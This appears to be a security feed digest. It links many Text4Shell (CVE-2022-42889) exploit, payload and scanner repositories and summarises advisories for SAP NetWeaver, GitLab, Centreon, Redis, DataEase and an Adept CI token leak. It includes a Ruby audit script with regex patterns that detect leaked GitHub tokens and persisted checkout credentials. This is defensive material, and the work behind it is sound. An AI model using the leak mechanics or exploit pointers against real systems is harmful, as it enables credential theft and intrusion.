https://github.com/smileostrich/Text4Shell-Scanner
https://github.com/Vulnmachines/text4shell-CVE-2022-42889
https://github.com/pwnb0y/Text4shell-exploit
https://github.com/kljunowsky/CVE-2022-42889-text4shell
https://github.com/Gotcha1G/CVE-2022-42889
https://github.com/dgor2023/cve-2022-42889-text4shell-docker
https://github.com/ClickCyber/cve-2022-42889
https://github.com/neerazz/CVE-2022-42889
https://github.com/YulinSec/t4scan
https://github.com/necroteddy/CVE-2022-42889
https://github.com/34006133/CVE-2022-42889
https://github.com/QAInsights/cve-2022-42889-jmeter
https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker
https://github.com/cxzero/CVE-2022-42889-text4shell
https://github.com/karthikuj/cve-2022-42889-text4shell-docker
https://github.com/joshbnewton31080/cve-2022-42889-text4shell
https://github.com/tulhan/commons-text-goat
https://github.com/akshayithape-devops/CVE-2022-42889-POC
https://github.com/808ale/CVE-2022-42889-Text4Shell-POC
https://github.com/stavrosgns/Text4ShellPayloads
https://github.com/aaronm-sysdig/text4shell-docker
https://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL
https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker
https://github.com/kiralab/text4shell-scan
https://github.com/gokul-ramesh/text4shell-exploit
https://github.com/s3l33/CVE-2022-42889
https://github.com/korteke/CVE-2022-42889-POC
https://github.com/eunomie/cve-2022-42889-check
https://github.com/chainguard-dev/text4shell-policy
https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889
https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
https://github.com/cryxnet/CVE-2022-42889-RCE
https://github.com/Afrouper/MavenDependencyCVE-Scanner
https://github.com/uk0/cve-2022-42889-intercept
https://github.com/rockmelodies/CVE-2022-42889
https://github.com/hotblac/text4shell
https://github.com/f0ng/text4shellburpscanner
https://github.com/Dima2021/cve-2022-42889-text4shell
https://github.com/humbss/CVE-2022-42889
https://github.com/securekomodo/text4shell-poc
Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 http://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##Spring Security CVE-2025-22234 on spring-security-crypto
https://www.herodevs.com/vulnerability-directory/cve-2025-22234
Discussions: https://discu.eu/q/https://www.herodevs.com/vulnerability-directory/cve-2025-22234
##Spring Security CVE-2025-22234 Introduces Username Enumeration Vector https://www.herodevs.com/vulnerability-directory/cve-2025-22234
##GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE), plan a quick patch cycle. While none of the flaws are scored as critical, the nature of a GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
This SQLi in Centreon Web is from a month ago but the CVE was published today.
sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.
A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.
This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.
Redis DoS.
https://github.com/redis/redis/security/advisories/GHSA-r67f-p999-2gff
sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
##Redis is an open source, in-memory database that persists on disk. In versions starting at 2.6 and prior to 7.4.3, an unauthenticated client can cause unlimited growth of output buffers, until the server runs out of memory or is killed. By default, the Redis configuration does not limit the output buffer of normal clients (see client-output-buffer-limit). Therefore, the output buffer can grow without bound over time. As a result, the service is exhausted and the memory is unavailable. When password authentication is enabled on the Redis server, but no password is provided, the client can still cause the output buffer to grow from "NOAUTH" responses until the system runs out of memory. This issue has been patched in version 7.4.3. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways: either using network access control tools like firewalls, iptables, security groups, etc., or enabling TLS and requiring users to authenticate using client side certificates.
Post-auth RCE in DataEase.
https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
sev:HIGH 8.2 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
##DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.
This is kind of a neat race condition:
https://github.com/AdeptLanguage/Adept/security/advisories/GHSA-8c7v-vccv-cx4q
sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there are a few seconds where an attacker can extract the token from the artifact and use it with the GitHub API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.
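The leak above is a generic CI hazard: an artifact built by zipping the checkout directory carries `.git/config`, and `actions/checkout` persists the job token there as an `extraheader = AUTHORIZATION: basic <base64>` entry unless `persist-credentials: false` is set. The following Ruby is an added example, not code from the Adept project or the advisory: a pre-upload audit that walks an artifact's file listing and flags a shipped `.git/config`, decodes any persisted checkout credential, and catches GitHub-style token literals elsewhere. The artifact contents are constructed for the example, and the `ghs_EXAMPLE…` token is a placeholder, not a real credential.

```ruby
# Added example: audit a CI artifact listing for leaked credentials before upload.
# Not the Adept project's code. Models the leak in the advisory above: a zip of
# the checkout directory that still contains .git/config with the job token.

# Constructed sample artifact as { path => contents }. The extraheader line
# mirrors how actions/checkout persists the token (base64 of "x-access-token:<token>").
SAMPLE_ARTIFACT = {
  "bin/adept" => "\x7fELF stub",
  "build.log" => "export GITHUB_TOKEN=ghs_EXAMPLEtokenNOTrealAAAAAAAAAA\n",
  ".git/config" => <<~GIT,
    [core]
    \trepositoryformatversion = 0
    [remote "origin"]
    \turl = https://github.com/example/repo
    [http "https://github.com/"]
    \textraheader = AUTHORIZATION: basic #{["x-access-token:ghs_EXAMPLEtokenNOTrealAAAAAAAAAA"].pack("m0")}
  GIT
}.freeze

# GitHub token prefixes (ghp_, gho_, ghu_, ghs_, ghr_) followed by the token body.
TOKEN_PATTERN = /\bgh[pousr]_[A-Za-z0-9]{20,}\b/

# Persisted git credential: "extraheader = AUTHORIZATION: basic <base64>".
EXTRAHEADER_PATTERN = /extraheader\s*=\s*AUTHORIZATION:\s*basic\s+([A-Za-z0-9+\/=]+)/i

# Returns an array of { path:, reason: } findings; empty means nothing
# credential-shaped was found in the listing.
def audit_artifact(files)
  findings = []
  files.each do |path, body|
    if path == ".git/config" || path.end_with?("/.git/config")
      # Shipping the repo config at all is a smell, even without a header.
      findings << { path: path, reason: "git config shipped in artifact" }
      body.scan(EXTRAHEADER_PATTERN).flatten.each do |b64|
        user = b64.unpack1("m").split(":", 2).first
        findings << { path: path, reason: "persisted checkout credential (user #{user})" }
      end
    end
    # Plain token literals in logs, scripts or env dumps bundled into the artifact.
    findings << { path: path, reason: "GitHub token literal" } if body =~ TOKEN_PATTERN
  end
  findings
end

def artifact_clean?(files)
  audit_artifact(files).empty?
end

if __FILE__ == $PROGRAM_NAME
  audit_artifact(SAMPLE_ARTIFACT).each { |f| puts "#{f[:path]}: #{f[:reason]}" }
  puts "clean: #{artifact_clean?(SAMPLE_ARTIFACT)}"
end
```

Running the audit as a workflow step before `upload-artifact` (and failing the job on any finding) closes the window the advisory describes; the root fix is still to build the artifact from an explicit file list rather than the whole checkout, or to check out with `persist-credentials: false` so the token is never written to `.git/config`.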
Security Advisory: Local privilege escalation in make-initrd-ng (CVE-2025-32438)
##